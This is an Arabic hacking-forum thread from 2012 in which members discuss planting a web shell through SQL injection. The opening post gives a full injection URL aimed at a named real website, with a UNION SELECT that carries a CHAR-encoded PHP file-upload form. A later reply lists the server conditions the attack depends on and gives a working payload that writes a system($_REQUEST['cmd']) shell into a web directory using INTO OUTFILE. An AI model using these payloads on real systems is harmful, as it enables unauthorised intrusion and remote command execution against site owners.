مشكل في مسار الشل بعد رفعه على الموقع - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

Gomina7 · 27/02/2012, 03:33

السلام عليكم

عندي مشكل هو
عند حقن موقع بهذه الطريقة

كود PHP:


			
http://www.chemmin.com/news_view.php?id=-41+union+select+1,CHAR%2871,%20111,%2077,%20105,%2078,%2097,%2055,%2032,%2060,%20104,%20116,%20109,%20108,%2062,%2060,%2098,%20111,%20100,%20121,%2032,%20116,%20101,%20120,%20116,%2061,%2034,%2035,%2070,%2070,%2048,%2048,%2048,%2048,%2034,%2032,%2098,%20103,%2099,%20111,%20108,%20111,%20114,%2061,%2034,%2035,%2048,%2048,%2048,%2048,%2048,%2048,%2034,%2062,%2032,%2032,%2060,%2063,%2032,%2036,%20117,%20112,%20108,%20111,%2097,%20100,%20100,%20105,%20114,%2032,%2061,%2032,%2039,%2046,%2047,%2039,%2059,%2032,%2036,%20117,%20112,%20108,%20111,%2097,%20100,%20102,%20105,%20108,%20101,%2032,%2061,%2032,%2036,%20117,%20112,%20108,%20111,%2097,%20100,%20100,%20105,%20114,%2032,%2046,%2032,%2098,%2097,%20115,%20101,%20110,%2097,%20109,%20101,%2040,%2036,%2095,%2070,%2073,%2076,%2069,%2083,%2091,%2039,%20117,%20115,%20101,%20114,%20102,%20105,%20108,%20101,%2039,%2093,%2091,%2039,%20110,%2097,%20109,%20101,%2039,%2093,%2041,%2059,%2032,%20105,%20102,%2032,%2040,%2032,%20105,%20115,%20115,%20101,%20116,%2040,%2036,%2095,%2070,%2073,%2076,%2069,%2083,%2091,%2034,%20117,%20115,%20101,%20114,%20102,%20105,%20108,%20101,%2034,%2093,%2041,%2032,%2041,%2032,%20123,%2032,%2032,%2032,%2032,%2032,%20101,%2099,%20104,%20111,%2032,%2034,%2085,%20112,%20108,%20111,%2097,%20100,%2032,%2034,%2059,%2032,%2032,%2032,%2032,%2032,%20105,%20102,%2032,%2040,%20109,%20111,%20118,%20101,%2095,%20117,%20112,%20108,%20111,%2097,%20100,%20101,%20100,%2095,%20102,%20105,%20108,%20101,%2032,%2040,%2036,%2095,%2070,%2073,%2076,%2069,%2083,%2091,%2034,%20117,%20115,%20101,%20114,%20102,%20105,%20108,%20101,%2034,%2093,%2091,%2034,%20116,%20109,%20112,%2095,%20110,%2097,%20109,%20101,%2034,%2093,%2044,%2032,%2036,%20117,%20112,%20108,%20111,%2097,%20100,%20102,%20105,%20108,%20101,%2041,%2041,%2032,%20101,%2099,%20104,%20111,%2032,%2036,%20117,%20112,%20108,%20111,%2097,%20100,%20102,%20105,%20108,%20101,%2059,%2032,%2032,%2032,%2032,%2032,%20101,%20108,%20115,%20101,%2032,%20101,%2099,%20104,%20111,%2032,%2034,%20102,%2097,%20105,%20108,%20101,%20100,%2034,%2059,%2032,%20125,%2032,%2032,%2063,%2062,%2032,%2032,%2060,%20112,%2032,%2097,%20108,%20105,%20103,%20110,%2061,%2034,%2099,%20101,%20110,%20116,%20101,%20114,%2034,%2062,%2060,%20102,%20111,%20110,%20116,%2032,%20102,%2097,%2099,%20101,%2061,%2034,%2065,%20114,%20105,%2097,%20108,%2034,%2032,%2099,%20111,%20108,%20111,%20114,%2061,%2034,%2035,%2056,%2048,%2056,%2048,%2056,%2048,%2034,%2062,%2060,%2098,%2062,%2085,%20112,%20108,%20111,%2097,%20100,%2032,%2089,%20111,%20117,%20114,%2032,%2070,%2097,%20118,%2032,%2083,%20104,%20101,%20108,%20108,%2032,%20111,%20114,%2032,%2077,%2097,%20105,%20108,%20101,%20114,%2032,%2046,%2046,%2046,%2060,%2047,%2098,%2062,%2060,%2047,%20102,%20111,%20110,%20116,%2062,%2060,%20112,%2032,%2097,%20108,%20105,%20103,%20110,%2061,%2034,%2099,%20101,%20110,%20116,%20101,%20114,%2034,%2062,%2060,%2098,%2062,%2060,%20102,%20111,%20110,%20116,%2032,%20102,%2097,%2099,%20101,%2061,%2034,%2065,%20114,%20105,%2097,%20108,%2034,%2062,%2067,%20114,%20101,%2097,%20116,%20101,%20100,%2032,%2066,%20121,%2032,%2058,%2032,%2060,%2047,%20102,%20111,%20110,%20116,%2062,%2060,%2047,%2098,%2062,%2060,%20102,%20111,%20110,%20116,%2032,%20102,%2097,%2099,%20101,%2061,%2034,%2084,%2097,%20104,%20111,%20109,%2097,%2034,%2062,%2060,%20115,%20116,%20114,%20111,%20110,%20103,%2062,%2032,%2032,%2071,%20111,%20109,%20105,%20110,%2097,%2055,%2060,%2047,%20115,%20116,%20114,%20111,%20110,%20103,%2062,%2060,%2047,%20102,%20111,%20110,%20116,%2062,%2060,%2047,%20112,%2062,%2032,%2060,%20102,%20111,%20114,%20109,%2032,%20110,%2097,%20109,%20101,%2061,%2034,%20117,%20112,%20108,%20102,%20111,%20114,%20109,%2034,%2032,%20109,%20101,%20116,%20104,%20111,%20100,%2061,%2034,%20112,%20111,%20115,%20116,%2034,%2032,%20101,%20110,%2099,%20116,%20121,%20112,%20101,%2061,%2034,%20109,%20117,%20108,%20116,%20105,%20112,%2097,%20114,%20116,%2047,%20102,%20111,%20114,%20109,%2045,%20100,%2097,%20116,%2097,%2034,%2062,%2032,%2060,%20112,%2032,%2097,%20108,%20105,%20103,%20110,%2061,%2034,%2099,%20101,%20110,%20116,%20101,%20114,%2034,%2062,%2032,%2060,%20105,%20110,%20112,%20117,%20116,%2032,%20116,%20121,%20112,%20101,%2061,%2034,%20102,%20105,%20108,%20101,%2034,%2032,%20110,%2097,%20109,%20101,%2061,%2034,%20117,%20115,%20101,%20114,%20102,%20105,%20108,%20101,%2034,%2062,%2032,%2060,%20105,%20110,%20112,%20117,%20116,%2032,%20116,%20121,%20112,%20101,%2061,%2034,%20115,%20117,%2098,%20109,%20105,%20116,%2034,%2062,%2032,%2060,%2047,%20112,%2062,%2032,%2060,%2047,%2098,%20111,%20100,%20121,%2062,%2060,%2047,%20104,%20116,%20109,%20108,%2062%29,3,4,5,6--

نستطيع انشاء سكريبت رفع عادي
لاكن المشكل
هو: هل هذا السكريبت باستطاعته رفع الشل على الموقع
فانا لم اجد مسار الشل مع الفحص الدقيق للموقع و ملفاته
و**** لكم

xdvb · 01/03/2012, 23:14

**** لك يااخي على الطريقة

مع انها قديمة

لاتستطيع يااخي

**chevr0sky** · 02/03/2012, 14:37

بامكانك رفع الشل بواسطة الحقن ( [] ) و لكن بشروط :

magic_quotes_gpc = Off
file_priv = Y
معرفة المسار كاملا
مجلد بصلاحيات الكتابة والقراءة (777)

[]

[]

Abu Hamid Madridi · 09/03/2012, 00:34

لافائدة منها باتا !

لقد درسناها وحاولنا ان ننجحها لكن لافائدة .. لن يرفع الشل لإن مركز الرفع خاطئ وإن وجدته انت فللبرآيفت معك ^^

**chevr0sky** · 09/03/2012, 10:32

الطريقة الصحيحة :

1- مجلدات يمكن الكتابة فيها.

كود PHP:


			
/temporary/

 /images/

 /cache/

 /temp/

الخ

مثال :

كود PHP:


			
UNION SELECT "<? system($_REQUEST***91;'cmd'***93;); ?>",2,3,4,5 INTO OUTFILE "/var/www/html/images/shell.php" --

مسار الشل بعد الحقن:

[]

أما ما تتكلمون عنه فمضيعة للوقت.

Gomina7 · 09/03/2012, 14:03

اقتباس:

chevr0sky يقول

الطريقة الصحيحة :

1- مجلدات يمكن الكتابة فيها.

كود PHP:


			
/temporary/
 /images/
 /cache/
 /temp/

الخ

مثال :

كود PHP:


			
union select "<? System($_request***91;'cmd'***93;); ?>",2,3,4,5 into outfile "/var/www/html/images/shell.php" --

مسار الشل بعد الحقن:

[]

أما ما تتكلمون عنه فمضيعة للوقت.

اه كلامك صحيح

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
تعال اعرف مسار الشل بعد رفعه من لوحة التحكم	MdMn HaCk3r	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	8	09/03/2012 13:37
Path: شارك مسار حياتك بأسلوب جميل	ADMINISTRATOR	[ منتدى اخبــــار الشبكـــة]	0	06/12/2011 10:02
اريد مسار لوحة التحكم	blandy26	[ منتدى حـقن قواعد البيانات \| Sql injcetion ]	1	25/05/2011 20:52
برنامج ايجاد مسار لوحة التحكم	Th3 WiTch3r-Dz	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	3	15/02/2011 16:07
معرفة مسار لوحة التحكم حتى لو كان صاحب الموقع مغير مسارها	MdMn HaCk3r	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	5	09/08/2010 02:25

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)

(أظهر الكل) الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 28
Abu Hamid Madridi , all4dz , chevr0sky , conFidenT , Cyclone , المفترس , Dr.AnTi_HaCkEr , dzkabyle , Ev!LScR!pT_Dz , eXc3lLenCe , Gomina7 , hardTARGET1234 , ib4dz , kanoticx , kevin death , loGin.Dz , ManiMan43 , moulay2010 , pain96 , r.k0_dz , root , SaMo_Dz , Smail002 , sni!ip3r , Th3 WiTch3r-Dz , ViRuS_Ra3cH , xdvb , X_AviaTique_X